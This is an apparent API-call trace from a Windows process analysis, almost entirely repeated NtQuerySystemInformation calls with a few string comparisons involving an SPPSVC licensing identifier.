[0271.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0271.392] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0271.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0271.414] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0271.422] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0271.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation 